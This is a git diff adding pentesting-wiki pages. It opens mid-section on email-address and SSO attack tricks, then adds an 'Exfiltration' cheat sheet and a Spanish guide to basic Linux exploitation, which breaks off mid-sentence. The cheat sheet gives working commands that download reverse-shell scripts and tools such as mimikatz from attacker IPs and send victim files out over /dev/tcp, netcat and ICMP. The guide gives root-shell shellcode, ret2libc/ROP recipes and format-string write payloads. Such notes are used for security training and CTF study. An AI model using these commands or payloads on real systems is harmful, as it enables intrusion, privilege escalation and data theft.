inti\(;inti@inti.io;\)@whitelisted.com +* inti@inti.io\(@whitelisted.com\) +* inti+\(@whitelisted.com;\)@inti.io + +### IPs + +You can also use IPs as domain named between square brackets: + +* john.doe@\[127.0.0.1\] +* john.doe@\[IPv6:2001:db8::1\] + +### Other vulns + +![](.gitbook/assets/image%20%28160%29.png) + +## Third party SSO + +### XSS + +Some services like **github** or **salesforce allows** you to create an **email address with XSS payloads on it**. If you can **use this providers to login on other services** and this services **aren't sanitising** correctly the email, you could cause **XSS**. + +### Account-Takeover + +If a **SSO service** allows you to **create an account without verifying the given email address** \(like **salesforce**\) and then you can use that account to **login in a different service** that **trusts** salesforce, you could access any account. +_Note that salesforce indicates if the given email was or not verified but so the application should take into account this info._ + +## Reply-To + +You can send an email using _**From: company.com**_ ****and _**Replay-To: attacker.com**_ and if any **automatic reply** is sent due to the email was sent **from** an **internal address** the **attacker** may be able to **receive** that **response**. + +## **References** + +* \*\*\*\*[**https://drive.google.com/file/d/1iKL6wbp3yYwOmxEtAg1jEmuOf8RM8ty9/view**](https://drive.google.com/file/d/1iKL6wbp3yYwOmxEtAg1jEmuOf8RM8ty9/view)\*\*\*\* + +## Hard Bounce Rate + +Some applications like AWS have a **Hard Bounce Rate** \(in AWS is 10%\), that whenever is overloaded the email service is blocked. + +A **hard bounce** is an **email** that couldn’t be delivered for some permanent reasons. Maybe the **email’s** a fake address, maybe the **email** domain isn’t a real domain, or maybe the **email** recipient’s server won’t accept **emails**\) , that means from total of 1000 emails if 100 of them were fake or were invalid that caused all of them to bounce, **AWS SES** will block your service. + +So, if you are able to **send mails \(maybe invitations\) from the web application to any email address, you could provoke this block by sending hundreds of invitations to nonexistent users and domains: Email service DoS.** + diff --git a/exfiltration.md b/exfiltration.md new file mode 100644 index 00000000000..1d5a1161104 --- /dev/null +++ b/exfiltration.md @@ -0,0 +1,316 @@ +# Exfiltration + +## Copy&Paste Base64 + +#### Linux + +```bash +base64 -w0 #Encode file +base64 -d file #Decode file +``` + +#### Windows + +```text +certutil -encode payload.dll payload.b64 +certutil -decode payload.b64 payload.dll +``` + +## HTTP + +#### Linux + +```bash +wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py +wget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm +curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py +fetch 10.10.14.14:8000/shell.py #FreeBSD +``` + +#### Windows + +```bash +certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 +bitsadmin /transfer transfName /priority high http://example.com/examplefile.pdf C:\downloads\examplefile.pdf + +#PS +(New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe") +Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe" +wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe" + +Import-Module BitsTransfer +Start-BitsTransfer -Source $url -Destination $output +#OR +Start-BitsTransfer -Source $url -Destination $output -Asynchronous +``` + +### Upload files + +\*\*\*\*[**SimpleHttpServerWithFileUploads**](https://gist.github.com/UniIsland/3346170)\*\*\*\* + +### **HTTPS Server** + +```python +# from https://gist.github.com/dergachev/7028596 +# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/ +# generate server.xml with the following command: +# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes +# run as follows: +# python simple-https-server.py +# then in your browser, visit: +# https://localhost:443 + +import BaseHTTPServer, SimpleHTTPServer +import ssl + +httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), SimpleHTTPServer.SimpleHTTPRequestHandler) +httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True) +httpd.serve_forever() +``` + +## FTP + +### FTP server \(python\) + +```bash +pip3 install pyftpdlib +python3 -m pyftpdlib -p 21 +``` + +### FTP server \(NodeJS\) + +```text +sudo npm install -g ftp-srv --save +ftp-srv ftp://0.0.0.0:9876 --root /tmp +``` + +### FTP server \(pure-ftp\) + +```bash +apt-get update && apt-get install pure-ftp +``` + +```bash +#Run the following script to configure the FTP server +#!/bin/bash +groupadd ftpgroup +useradd -g ftpgroup -d /dev/null -s /etc ftpuser +pure-pwd useradd fusr -u ftpuser -d /ftphome +pure-pw mkdb +cd /etc/pure-ftpd/auth/ +ln -s ../conf/PureDB 60pdb +mkdir -p /ftphome +chown -R ftpuser:ftpgroup /ftphome/ +/etc/init.d/pure-ftpd restart +``` + +### **Windows** client + +```bash +#Work well with python. With pure-ftp use fusr:ftp +echo open 10.11.0.41 21 > ftp.txt +echo USER anonymous >> ftp.txt +echo anonymous >> ftp.txt +echo bin >> ftp.txt +echo GET mimikatz.exe >> ftp.txt +echo bye >> ftp.txt +ftp -n -v -s:ftp.txt +``` + +## SMB + +Kali as server + +```bash +kali_op1> impacket-smbserver -smb2support kali `pwd` # Share current directory +kali_op2> smbserver.py -smb2support name /path/folder # Share a folder +#For new Win10 versions +impacket-smbserver -smb2support -user test -password test test `pwd` +``` + +Or create a **smb** share **using samba**: + +```bash +apt-get install samba +mkdir /tmp/smb +chmod 777 /tmp/smb +#Add to the end of /etc/samba/smb.conf this: +[public] + comment = Samba on Ubuntu + path = /tmp/smb + read only = no + browsable = yes + guest ok = Yes +#Start samba +service smbd restart +``` + +Windows + +```bash +CMD-Wind> \\10.10.14.14\path\to\exe +CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentials + +WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.14.9\kali" +WindPS-2> cd new_disk: +``` + +## SCP + +The attacker has to have SSHd running. + +```bash +scp @:/ +``` + +## NC + +```bash +nc -lvnp 4444 > new_file +nc -vn 4444 < exfil_file +``` + +## /dev/tcp + +### Download file from victim + +```bash +nc -lvnp 80 > file #Inside attacker +cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim +``` + +### Upload file to victim + +```bash +nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker +# Inside victim +exec 6< /dev/tcp/10.10.10.10/4444 +cat <&6 > file.txt +``` + +thanks to **@BinaryShadow\_** + +## **ICMP** + +```bash +#In order to exfiltrate the content of a file via pings you can do: +xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line ; done +#This will 4bytes per ping packet (you could probablie increase this until 16) +``` + +```python +from scapy.all import * +#This is ippsec receiver created in the HTB machine Mischief +def process_packet(pkt): + if pkt.haslayer(ICMP): + if pkt[ICMP].type == 0: + data = pkt[ICMP].load[-4:] #Read the 4bytes interesting + print(f"{data.decode('utf-8')}", flush=True, end="") + +sniff(iface="tun0", prn=process_packet) +``` + +## **SMTP** + +If you can send data to an SMTP server, you can create a SMTP to receive the data with python: + +```bash +sudo python -m smtpd -n -c DebuggingServer :25 +``` + +## TFTP + +By default in XP and 2003 \(in others it need to be explicitly added during installation\) + +In Kali, **start TFTP server**: + +```bash +#I didn't get this options working and I prefer the python option +mkdir /tftp +atftpd --daemon --port 69 /tftp +cp /path/tp/nc.exe /tftp +``` + +**TFTP server in python:** + +```bash +pip install ptftpd +ptftpd -p 69 tap0 . # ptftp -p +``` + +In **victim**, connect to the Kali server: + +```bash +tftp -i get nc.exe +``` + +## PHP + +Download a file with a PHP oneliner: + +```bash +echo "" > down2.php +``` + +## VBScript + +```bash +Attacker> python -m SimpleHTTPServer 80 +``` + +#### Victim + +```bash +echo strUrl = WScript.Arguments.Item(0) > wget.vbs +echo StrFile = WScript.Arguments.Item(1) >> wget.vbs +echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs +echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs +echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs +echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs +echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs +echo Err.Clear >> wget.vbs +echo Set http = Nothing >> wget.vbs +echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs +echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs +echo If http Is Nothing Then Set http =CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs +echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs +echo http.Open "GET", strURL, False >> wget.vbs +echo http.Send >> wget.vbs +echo varByteArray = http.ResponseBody >> wget.vbs +echo Set http = Nothing >> wget.vbs +echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs +echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs +echo strData = "" >> wget.vbs +echo strBuffer = "" >> wget.vbs +echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs +echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs +echo Next >> wget.vbs +echo ts.Close >> wget.vbs +``` + +```bash +cscript wget.vbs http://10.11.0.5/evil.exe evil.exe +``` + +## Debug.exe + +This is a crazy technique that works on Windows 32 bit machines. Basically the idea is to use the `debug.exe` program. It is used to inspect binaries, like a debugger. But it can also rebuild them from hex. So the idea is that we take a binaries, like `netcat`. And then disassemble it into hex, paste it into a file on the compromised machine, and then assemble it with `debug.exe`. + +`Debug.exe` can only assemble 64 kb. So we need to use files smaller than that. We can use upx to compress it even more. So let's do that: + +```text +upx -9 nc.exe +``` + +Now it only weights 29 kb. Perfect. So now let's disassemble it: + +```text +wine exe2bat.exe nc.exe nc.txt +``` + +Now we just copy-paste the text into our windows-shell. And it will automatically create a file called nc.exe + +## DNS + +[https://github.com/62726164/dns-exfil](https://github.com/62726164/dns-exfil) + diff --git a/exploiting/linux-exploiting-basic-esp/README.md b/exploiting/linux-exploiting-basic-esp/README.md new file mode 100644 index 00000000000..fab1d262559 --- /dev/null +++ b/exploiting/linux-exploiting-basic-esp/README.md @@ -0,0 +1,924 @@ +# Linux Exploiting \(Basic\) \(SPA\) + +## **ASLR** + +Aleatorización de direcciones + +**Desactiva aleatorizacion\(ASLR\) GLOBAL \(root\)**: +echo 0 > /proc/sys/kernel/randomize\_va\_space +Reactivar aletorizacion GLOBAL: echo 2 > /proc/sys/kernel/randomize\_va\_space + +**Desactivar para una ejecución** \(no requiere root\): +setarch \`arch\` -R ./ejemplo argumentos +setarch \`uname -m\` -R ./ejemplo argumentos + +**Desactivar protección de ejecución en pila** +gcc -fno-stack-protector -D\_FORTIFY\_SOURCE=0 -z norelro -z execstack ejemplo.c -o ejemplo + +**Core file** +ulimit -c unlimited +gdb /exec core\_file +/etc/security/limits.conf -> \* soft core unlimited + +**Text +Data +BSS +Heap** + +**Stack** + +## **1.STACK OVERFLOWS** + +> buffer overflow, buffer overrun, stack overrun, stack smashing + +Fallo de segmentación o violación de segmento: Cuando se intenta acceder a una dirección de memoria que no ha sido asignada al proceso. + +**Sección BSS**: Variables globales o estáticas sin inicializar + +```text +static int i; +``` + +**Sección DATA**: Variables globales o estáticas inicializadas + +```text +int i = 5; +``` + +**Sección TEXT**: Instrucciones del código \(opcodes\) + +**Sección HEAP**: Buffer reservados de forma dinánima \(malloc\(\), calloc\(\), realloc\(\) \) + +**Sección STACK**: La pila \(Argumentos pasados, cadenas de entorno \(env\), variables locales…\) + +Para obtener la dirección de una función dentro de un programa se puede hacer: + +```text +objdump -d ./PROGRAMA | grep FUNCION +``` + +Si necesitas una dirección del Stack el GDB modifica variables de entorno que hae que cambie la dirección con respecto ala ejecución normal: + +* `unset env LINES` +* `unset env COLUMNS` +* `set env _=path` donde path es la ruta absoluta al programa +* explotar el programa usando la ruta absoluta +* asegúrate de que PWD y OLDPWD son las mismas que en gdb + +## **2.SHELLCODE** + +Ver interrupciones de kernel: cat /usr/include/i386-linux-gnu/asm/unistd\_32.h \| grep “\_\_NR\_” + +setreuid\(0,0\); // \_\_NR\_setreuid 70 +execve\(“/bin/sh”, args\[\], NULL\); // \_\_NR\_execve 11 +exit\(0\); // \_\_NR\_exit 1 + +xor eax, eax ; limpiamos eax +xor ebx, ebx ; ebx = 0 pues no hay argumento que pasar +mov al, 0x01 ; eax = 1 —> \_\_NR\_exit 1 +int 0x80 ; Ejecutar syscall + +**nasm -f elf assembly.asm** —> Nos devuelve un .o +**ld assembly.o -o shellcodeout** —> Nos da un ejecutable formado por el código ensamblador y podemos sacar los opcodes con **objdump +objdump -d -Mintel ./shellcodeout** —> Para ver que efectivamente es nuestra shellcode y sacar los OpCodes + +**Comprobar que la shellcode funciona** + +```text +char shellcode[] = “\x31\xc0\x31\xdb\xb0\x01\xcd\x80” + +void main(){ + void (*fp) (void); + fp = (void *)shellcode; + fp(); +} +``` + +Para ver que las llamadas al sistema se realizan correctamente se debe compilar el programa anterior y las llamadas del sistema deben aparecer en **strace ./PROGRAMA\_COMPILADO** + +A la hora de crear shellcodes se puede realizar un truco. La primera instrucción es un jump a un call. El call llama al código original y además mete en el stack el EIP. Después de la instrucción call hemos metido el string que necesitásemos, por lo que con ese EIP podemos señalar al string y además continuar ejecutando el código. + +EJ **TRUCO \(/bin/sh\)**: + +```text +jmp 0x1f ; Salto al último call +popl %esi ; Guardamos en ese la dirección al string +movl %esi, 0x8(%esi) ; Concatenar dos veces el string (en este caso /bin/sh) +xorl %eax, %eax ; eax = NULL +movb %eax, 0x7(%esi) ; Ponemos un NULL al final del primer /bin/sh +movl %eax, 0xc(%esi) ; Ponemos un NULL al final del segundo /bin/sh +movl $0xb, %eax ; Syscall 11 +movl %esi, %ebx ; arg1=“/bin/sh” +leal 0x8(%esi), %ecx ; arg[2] = {“/bin/sh”, “0”} +leal 0xc(%esi), %edx ; arg3 = NULL +int $0x80 ; excve(“/bin/sh”, [“/bin/sh”, NULL], NULL) +xorl %ebx, %ebx ; ebx = NULL +movl %ebx, %eax +inc %eax ; Syscall 1 +int $0x80 ; exit(0) +call -0x24 ; Salto a la primera instrución +.string \”/bin/sh\” ; String a usar +``` + +**EJ usando el Stack\(/bin/sh\):** + + +```text +section .text +global _start +_start: +xor eax, eax ;Limpieza +mov al, 0x46 ; Syscall 70 +xor ebx, ebx ; arg1 = 0 +xor ecx, ecx ; arg2 = 0 +int 0x80 ; setreuid(0,0) +xor eax, eax ; eax = 0 +push eax ; “\0” +push dword 0x68732f2f ; “//sh” +push dword 0x6e69622f; “/bin” +mov ebx, esp ; arg1 = “/bin//sh\0” +push eax ; Null -> args[1] +push ebx ; “/bin/sh\0” -> args[0] +mov ecx, esp ; arg2 = args[] +mov al, 0x0b ; Syscall 11 +int 0x80 ; excve(“/bin/sh”, args[“/bin/sh”, “NULL”], NULL) +``` + +**EJ FNSTENV:** + +```text +fabs +fnstenv [esp-0x0c] +pop eax ; Guarda el EIP en el que se ejecutó fabs +… +``` + +**Egg Huter:** + +Consiste en un pequeño código que recorre las páginas de memoria asociadas a un proceso en busca de la shellcode ahi guardada \(busca alguna firma puesta en la shellcode\). Útil en los casos en los que solo se tiene un pequeño espacio para inyectar código. + +**Shellcodes polimórficos** + +Consisten el shells cifradas que tienen un pequeño códigos que las descifran y saltan a él, usando el truco de Call-Pop este sería un **ejemplo cifrado cesar**: + +```text +global _start +_start: + jmp short magic +init: + pop esi + xor ecx, ecx + mov cl,0 ; Hay que sustituir el 0 por la longitud del shellcode (es lo que recorrerá) +desc: + sub byte[esi + ecx -1], 0 ; Hay que sustituir el 0 por la cantidad de bytes a restar (cifrado cesar) + sub cl, 1 + jnz desc + jmp short sc +magic: + call init +sc: + ;Aquí va el shellcode +``` + +1. **Atacando el Frame Pointer \(EBP\)** + +Útil en una situación en la que podemos modificar el EBP pero no el EIP. + +Se sabe que al salir de una función se ejecuta el siguente código ensamblador: + +```text +movl %ebp, %esp +popl %ebp +ret +``` + +De esta forma, si se puede modificar el EBP al salir de una función \(fvuln\) que ha sido llamada por otra función, cuando la función que llamó a fvuln finalice, su EIP puede ser modificado. + +En fvuln se puede introducir un EBP falso que apunte a un sitio donde esté la direcciónd e la shellcode + 4 \(hay que sumarle 4 por el pop\). Así, al salir de la función, se meterá en ESP el valor de &\(&Shellcode\)+4, con el pop se le restará 4 al ESP y este apuntará a la dirección de la shellcode cuando se ejcute el ret. + +**Exploit:** +&Shellcode + "AAAA" + SHELLCODE + relleno + &\(&Shellcode\)+4 + +**Off-by-One Exploit** +Se permite modificar tan solo el byte menos significativo del EBP. Se puede llevar a cabo un ataque como el anterior pero la memoria que guarda la dirección de la shellcode debe compartir los 3 primeros bytes con el EBP. + +## **4. Métodos return to Libc** + +Método útil cuando el stack no es ejecutable o deja un buffer muy pequeño para modificar. + +El ASLR provoca que en cada ejecución las funciones se carguen en posiciones distintas de la memoria. Por lo tanto este método puede no ser efectivo en ese caso. Para servidores remotos, como el programa está siendo ejecutado constantemente en la misma dirección sí puede ser útil. + +* **cdecl\(C declaration\)** Mete los argumentos en el stack y tras salir de la función limpia la pila +* **stdcall\(standard call\)** Mete los argumentos en la pila y es la función llamada la que la limpia +* **fastcall** Mete los dos primeros argumentos en registros y el resto en la pila + +Se pone la dirección de la instrucción system de libc y se le pasa como argumento el string “/bin/sh”, normalmente desde una variable de entorno. Además, se usa la dirección a la función exit para que una vez que no se requiera más la shell, salga el programa sin dar problemas \(y escribir logs\). + +**export SHELL=/bin/sh** + +Para encontrar las direcciones que necesitaremos se puede mirar dentro de **GDB: +p system +p exit +rabin2 -i ejecutable** —> Da la dirección de todas las funciones que usa el programa al cargarse +\(Dentro de un start o algun breakpoint\): **x/500s $esp** —> Buscamos dentro de aqui el string /bin/sh + +Una vez tengamos estas direcciones el **exploit** quedaría: + +“A” \* DISTANCIA EBP + 4 \(EBP: pueden ser 4 "A"s aunque mejor si es el EBP real para evitar fallos de segmentación\) + Dirección de **system** \(sobreescribirá el EIP\) + Dirección de **exit** \(al salir de system\(“/bin/sh”\) se llamará a esta función pues los primero 4bytes del stack son tratados como la siguiente dirección del EIP a ejecutar\) + Dirección de “**/bin/sh**” \(será el parámetro pasado a system\) + +De esta forma el EIP se sobreescribirá con la dirección de system la cual recibirá como parámetro el string “/bin/sh” y al salir de este ejecutará la función exit\(\). + +Es posible encontrarse en la situación de que algún byte de alguna dirección de alguna función sea nulo o espacio \(\x20\). En ese caso se pueden desensamblar las direcciones anteriores a dicha función pues probablemente haya varios NOPs que nos permitan poder llamar a alguno de ellos en vez de a la función directamente \(por ejemplo con > x/8i system-4\). + +Este método funciona pues al llamar a una función como system usando el opcode **ret** en vez de **call**, la función entiende que los primeros 4bytes serán la dirección **EIP** a la que volver. + +Una técnica interesante con este método es el llamar a **strncpy\(\)** para mover un payload del stack al heap y posteriormente usar **gets\(\)** para ejecutar dicho payload. + +Otra técnica interesante es el uso de **mprotect\(\)** la cual permite asignar los permisos deseados a cualquier parte de la memoria. Sirve o servía en BDS, MacOS y OpenBSD, pero no en linux\(controla que no se puedan otorgar a la vez permisos de escritura y ejecución\). Con este ataque se podría volver a configurar la pila como ejecutable. + +#### **Encadenamiento de funciones** + +Basándonos en la técnica anterior, esta forma de exploit consiste en: +Relleno + &Función1 + &pop;ret; + &arg\_fun1 + &Función2 + &pop;ret; + &arg\_fun2 + … + +De esta forma se pueden encadenar funciones a las que llamar. Además, si se quieren usar funciones con varios argumentos, se pueden poder los argumentos necesarios \(ej 4\) y poner los 4 argumentos y buscar dirección a un sitio con opcodes: pop, pop, pop, pop, ret —> **objdump -d ejecutable** + +#### **Encadenamiento mediante falseo de frames \(encadenamiento de EBPs\)** + +Consiste en aprovechar el poder manipular el EBP para ir encadenando la ejecución de varias funciones a través del EBP y de "leave;ret" + +RELLENO ++ Situamos en el EBP un EBP falso que apunta a: 2º EBP\_falso + la función a ejecutar: \(&system\(\) + &leave;ret + &“/bin/sh”\) ++ En el EIP ponemos de dirección una función &\(leave;ret\) + +Iniciamos la shellcode con la dirección a la siguiente parte de la shellcode, por ej: 2ºEBP\_falso + &system\(\) + &\(leave;ret;\) + &”/bin/sh” + +el 2ºEBP sería: 3ºEBP\_falso + &system\(\) + &\(leave;ret;\) + &”/bin/ls” + +Esta shellcode se puede repetir indefinidamente en las partes de memoria a las que se tenga acceso de forma que se conseguirá una shellcode fácilmente divisible por pequeños trozos de memoria. + +\(Se encadena la ejecución de funciones mezclando las vulnerabilidades vistas anteriormente de EBP y de ret2lib\) + +## **5.Métodos complementarios** + +#### **Ret2Ret** + +Útil para cuando no se puede meter una dirección del stack en el EIP \(se comprueba que el EIP no contenga 0xbf\) o cuando no se puede calcular la ubicación de la shellcode. Pero, la función vulnerable acepte un parámetro \(la shellcode irá aquí\). + +De esta forma, al cambiar el EIP por una dirección a un **ret**, se cargará la siguiente dirección \(que es la dirección del primer argumento de la función\). Es decir, se cargará la shellcode. + +El exploit quedaría: SHELLCODE + Relleno \(hasta EIP\) + **&ret** \(los siguientes bytes de la pila apuntan al inicio de la shellcode pues se mete en el stack la dirección al parámetro pasado\) + +Al parecer funciones como **strncpy** una vez completas eliminan de la pila la dirección donde estaba guardada la shellcode imposibilitando esta técnica. Es decir, la dirección que pasan a la función como argumento \(la que guarda la shellcode\) es modificada por un 0x00 por lo que al llamar al segundo **ret** se encuentra con un 0x00 y el programa muere. + + **Ret2PopRet** + +Si no tenemos control sobre el primer argumento pero sí sobre el segundo o el tercero, podemos sobreescribir EIP con una dirección a pop-ret o pop-pop-ret, según la que necesitemos. + +#### **Técnica de Murat** + +En linux todos los progamas se mapean comenzando en 0xbfffffff + +Viendo como se construye la pila de un nuevo proceso en linux se puede desarrollar un exploit de forma que programa sea arrancado en un entorno cuya única variable sea la shellcode. La dirección de esta entonces se puede calcular como: addr = 0xbfffffff - 4 - strlen\(NOMBRE\_ejecutable\_completo\) - strlen\(shellcode\) + +De esta forma se obtendría de forma sensilla la dirección donde está la variable de entorno con la shellcode. + +Esto se puede hacer gracias a que la función execle permite crear un entorno que solo tenga las variables de entorno que se deseen + +#### **Jump to ESP: Windows Style** + +Debido a que el ESP está apuntando al comienzo del stack siempre, esta técnica consiste con sustituir el EIP con la dirección a una llamada a **jmp esp** o **call esp**. De esta forma, se guarda la shellcode después de la sobreescritura del EIP ya que después de ejecutar el **ret** el ESP se encontrará apuntando a la dirección siguiente, justo donde se ha guardado la shellcode. + +En caso de que no se tenga el ASLR activo en Windows o Linux se puede llamar a **jmp esp** o **call esp** almacenadas en algún objeto compartido. En caso de que esté el ASLR, se podría buscar dentro del propio programa vulnerable. + +Además, el hecho de poder colocar la shellcode después de la corrupción del EIP en vez de en medio del stack, permite que las instrucciones push o pop que se ejecuten en medio de la función no lleguen a tocar la shellcode \(cosa que podría ocurrir en caso de ponerse en medio del stack de la función\). + +De forma muy similar a esto si sabemos que una función devuelve la dirección donde está guardada la shellcode se puede llamar a **call eax** o **jmp eax \(ret2eax\).** + +#### **ROP \(Return Oriented Programming\) o borrowed code chunks** + +Los trozos de código que se invocan se conocen como gadgets. + +Esta técnica consiste en encadenar distintas llamadas a funciones mediante la técnica de **ret2libc** y el uso de **pop,ret**. + +En algunas arquitecturas de procesadores cada instrucción es un conjunto de 32bits \(MIPS por ej\). Sin embargo, en Intel las instrucciones son de tamaño variable y varias instrucciones pueden compartir un conjunto de bits, por ejemplo: + +**movl $0xe4ff, -0x\(%ebp\)** —> Contiene los bytes 0xffe4 que también se traducen por: **jmp \*%esp** + +De esta forma se pueden ejecutar algunas instrucciones que realmente ni si quiera está en el programa original + +**ROPgadget.py** nos ayuda a encontrar valores en binarios + +Este programa también sirve para crear los **payloads**. Le puedes dar la librería de la que quieres sacar los ROPs y él generará un payload en python al cual tu le das la dirección en la que está dicha librería y el payload ya está listo para ser usado como shellcode. Además, como usa llamadas al sistema no ejecuta realmente nada en el stack sino que solo va guardando direcciones de ROPs que se ejecutarán mediante **ret**. Para usar este payload hay que llamar al payload mediante una instrucción **ret**. + +#### **Integer overflows** + +Este tipo de overflows se producen cuando una variable no está preparada para soportar un número tan grande como se le pasa, posiblemente por una confusión entre variables con y sin signo, por ejemplo: + +```c +#include +#include +#include + +int main(int argc, char *argv[]){ +int len; +unsigned int l; +char buffer[256]; +int i; +len = l = strtoul(argv[1], NULL, 10); +printf("\nL = %u\n", l); +printf("\nLEN = %d\n", len); +if (len >= 256){ +printf("\nLongitus excesiva\n"); +exit(1); +} +if(strlen(argv[2]) < l) +strcpy(buffer, argv[2]); +else +printf("\nIntento de hack\n"); +return 0; +} +``` + +En el ejemplo anterior vemos que el programa se espera 2 parámetros. El primero la longitud de la siguiente cadena y el segundo la cadena. + +Si le pasamos como primer parámetro un número negativo saldrá que len < 256 y pasaremos ese filtro, y además también strlen\(buffer\) será menor que l, pues l es unsigned int y será muy grande. + +Este tipo de overflows no busca lograr escribir algo en el proceso del programa, sino superar filtros mal diseñados para explotar otras vulnerabilidades. + +#### **Variables no inicializadas** + +No se sabe el valor que puede tomar una variable no inicializada y podría ser interesante observarlo. Puede ser que tome el valor que tomaba una variable de la función anterior y esta sea controlada por el atacante. + +## **6.Explotando format strings** + +Cuando se llama a printf se ponen los parámetros de forma ordenada. + +%08x —> 8 bytes hexadecimales +%d —> Entero +%u —> Entero sin signo +%s —> Cadena +%n —> Bytes escritos +%hn —> Ocupa 2 bytes en vez de 4 +<n>$X —> Parámetro de acceso directo —> \(“%3$d”, var1, var2, var3\) —> Accede directamente a var3 + +AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x. +AAAA.%4\$x —> 4º parametro +AAAA%.6000x%4\$n —> Se escribe 6004 en la dirección que apunta el 4º parametro +AAAA%6000d%4\$n —> Se escribe 6004 en la dirección que apunta el 4º parametro +AAAA.%500\$08x —> Parámetro en el offset 500 + +**objdump -t ./exec \| grep varBss +objdump -TR ./exec \| grep exit\(func lib\) +objdump -d ./exec \| grep funcCode +objdump -D ./exec \| grep "VAR\_NAME"** --> Direccion de memoria donde se carga una variable stática \(en la region DATA\) + +Con %n escribimos el número bytes escritos y normalmente podremos controlar dónde, si por ejemplo queremos escribir el valor 400 en una dirección que es el 8º parámetro: + +python -c ‘print “DIRECCION” ’%.396d%8\$n + +#### **DTOR** + +Los destructores son funciones que se ejecutan justo antes de la finalización de un programa. + +**objdump -s -j .dtors /exec +rabin -s /exec \| grep “\_\_DTOR”** + +Si se logra escribir algo en \_\_DTOR\_END\_\_ la dirección de una shellcode, esta se ejecutará a la salida del programa. + +Los DTOR se encuentran entre los valores ffffffff y 00000000, por lo que si no hay ningún DTOR encontraremos al ejecutar el **objdump** esos valores seguidos. Entonces, si introducimos una valor entre ambos, será tomado como lla dirección de una función y se ejecutará \(es decir, hay que sobreescribir el 00000000\). + +Es raro que hoy en día un binario tenga DTORs. + +#### **GOT \(Tabla de offsets global\) - Mejor esta que la anterior si se puede elegir** + +Contiene las direcciones absolutas de las funciones que son utilizadas en un programa. + +**objdump -s -j .got ./exec +\(peda\)> x/20x 0xDIR\_GOT** --> Se ve una lista con las direcciones de las funciones +**\(peda\)> x/i 0xDIR\_FUNC\_GOT** --> Veríamos el inicio de una función \(probablemente un push ebp\) + +or using GEF you can start a debugging session and execute `got` to see the got table. + +You can see the PLT addresses with `objdump -j .plt -d ./vuln_binary` + +In a binary the GOT has the addresses of the functions \(pointing to the PLT\). The goal of this exploit is to override the GOT entry of a function that is going to be executed later with the address of the PLT of the system function. Ideally, you will override the GOT of a function that is going to be called with parameters controlled by you \(so you will be able to control the parameters sent to the system function\). + +If system isn't used by the script, the system function won't have an entry in the PLT. In this scenario, you will need to leak first the address of the system function. + +You an find a **template** to exploit the GOT using format-strings here: + +{% page-ref page="format-string-template.md" %} + +#### **Exploit \(format strings\)** + +Si modificamos el valor de la dirección de una de estas funciones y apuntamos a una shellcode y esta función se ejecuta después del printf tendremos un exploit. + +Para escribir la dirección de una shellcode normalmente hay que escribirla en dos pasos, primero 2 bytes y luego los otros 2, para ello se usa $hn. + +HOB —> 2bytes superiores de la dirección de la shellcode +LOB —> 2bytes inferiores de la dirección de la shellcode + +Hay que escribir siempre primero el menor de \[HOB, LOB\] y luego el otro. + +Si HOB < LOB +\[dirección+2\]\[direccion\]%.\[HOB-8\]x%\[offset\]\$hn%.\[LOB-HOB\]x%\[offset+1\] + +Si HOB > LOB +\[dirección+2\]\[direccion\]%.\[LOB-8\]x%\[offset+1\]\$hn%.\[HOB-LOB\]x%\[offset\] + +HOB LOB HOB\_shellcode-8 NºParam\_dir\_HOB LOB\_shell-HOB\_shell NºParam\_dir\_LOB + +\`python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"'\` + +#### **Format Strings como Buffer Overflows** + +La función **sprintf** copia a un string \(char \*str\) lo mismo que se le pasaría a una función printf. Es decir, si no tiene en cuenta el formato \(“%s”\), y el string introducido es dominado por el atacante, se puede introducir una cadena como %.44xAAAA —> Que hará escribir 44bytes +”AAAA” en \*str y eso puede provocar un bufferoverflow. + +#### **Estructuras \_\_atexit \(ya no útil en general\)** + +atexit\(\) es una función a la cuál se le pasan como parámetros otras funciones y estas funciones se ejecutarán al ejecutarse un exit\(\) o el return del main. + +Si se consigue modificar la dirección de alguna de estas funciones para que apunte a un shellcode se ganaría el control del proceso, pero actualmente esto es más complicado. + +Actualmente las direcciones a las funciones que hay que ejecutar se esconden tras varias estructuras y finalmente la dirección a la que apunta no son las direcciones de las funciones, sino que están cifradas con XOR y desplazamientos con una clave aleatoria. Por lo que actualmente este vector de ataque no es de mucha utilidad por lo menos en x86 y x64\_86. La función de cifrado es PTR\_MANGLE. + +Otras arquitecturas como m68k, mips32, mips64, aarch64, arm, hppa… No implementas la función de cifrado pues que esta devuelve lo mismo que recibió como entrada. Así que estas arquitectura sí serían 